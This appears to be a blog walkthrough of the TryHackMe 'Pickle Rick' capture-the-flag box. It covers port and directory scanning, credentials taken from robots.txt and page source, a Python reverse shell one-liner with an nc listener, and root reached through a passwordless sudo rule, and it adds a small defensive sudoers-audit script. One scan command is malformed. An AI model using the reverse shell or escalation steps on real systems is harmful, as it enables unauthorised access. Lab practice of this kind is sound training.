Pickle Rick - CTF Walkthrough
Hello Everyone! Welcome to the new blog. In this post we cover, step by step, the challenge of a box named Pickle Rick on TryHackMe.
Before starting, make sure that you are connected to the TryHackMe VPN and that the machine has deployed successfully.
After deploying the machine, wait 2–3 minutes and then ping it to confirm that it is reachable.
Now start an nmap scan to find the open ports and the services running on the machine.
Command: nmap -s -s -s -A 10.10.229.87 -oA pickle_nmap
There are two open ports: 80 and 22.
Let us scan for directories using gobuster.
Command: gobuster dir -u http://10.10.229.87 -w /usr/share/wordlists/dirb/common.txt -t 100 -o pickle_dir
Now we will use a different wordlist for the directory scan.
Command: gobuster dir -u http://10.10.229.87 -w /usr/share/SecLists/Discovery/web-content/directory-list-2.3-big.txt -t 100 -o piclr_dir2
After opening the URL below, we reach the Help Morty website.
Checking robots.txt, as usual, we found a password.
Further enumeration and inspection of the web page source code revealed the username.
From our earlier directory scan we have login.php, which gives us the login page.
Now we will use the credentials we obtained.
We were able to log in to the portal and now have a command panel. Running the list command in the command panel shows files named 'Sup3rS3cretPickl3Ingred.txt' and 'clue.txt'. Let's check the contents of the file. While doing so we found that many Linux commands are not allowed in this command panel.
But a slight modification to the cat command worked.
Let's check the content of 'clue.txt'; it says that the other flags are also in the file system.
Let's first check the current working directory: it is /var/www/html.
Now we will use a Python reverse shell one-liner to gain a reverse shell. Before this we set up a listener on our local Kali machine.
Command: nc -lnvp 1234
python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('LHOST',LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();"
As we can see, we obtained a reverse shell.
Now we want to escalate our privileges. On enumeration we found that the user www-data can execute all commands with sudo without a password.
Command: sudo bash
And we got the root shell.
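The root shell above comes from a sudoers rule that lets the web server account run ALL commands as root with NOPASSWD. As an added example, not part of the original walkthrough, here is a small Python audit that parses sudoers content and flags exactly that kind of grant; the sudoers text is a constructed sample and SERVICE_ACCOUNTS is an assumed list of daemon accounts.

```python
import re

# Constructed /etc/sudoers content modelled on the misconfiguration found on
# the box: the web server account may run any command as root with no password.
SAMPLE_SUDOERS = """\
# constructed sample, not the box's real file
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
#includedir /etc/sudoers.d
"""

# Assumed list of accounts that network-facing daemons run as; a blanket
# passwordless grant to any of them turns a web command-injection bug into root.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "httpd", "nobody"}

# user  host=(runas)  TAG: TAG: commands   (runas and tags are optional)
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Return (user, runas, tags, commands) for every user specification line;
    comments, blank lines, Defaults and #include* directives are skipped."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drops comments and #include*
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            specs.append((m.group("user"), m.group("runas") or "root",
                          tags, m.group("cmds").strip()))
    return specs

def find_passwordless_root(text):
    """Flag grants that run ALL commands as root without a password.
    Returns (user, severity) pairs; service accounts are rated 'critical'."""
    findings = []
    for user, runas, tags, cmds in parse_sudoers(text):
        runs_as_root = runas.split(":")[0] in ("ALL", "root")
        if "NOPASSWD" in tags and cmds == "ALL" and runs_as_root:
            findings.append((user, "critical" if user in SERVICE_ACCOUNTS else "high"))
    return findings

if __name__ == "__main__":
    for user, severity in find_passwordless_root(SAMPLE_SUDOERS):
        print(f"{severity}: {user} can run ALL as root without a password")
```

Point the same function at the output of `sudo -l` parsing or at files under /etc/sudoers.d to audit a fleet for the pattern this box demonstrates.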
On searching we found the second ingredient as well.
We successfully completed the challenge. Hope you enjoyed it.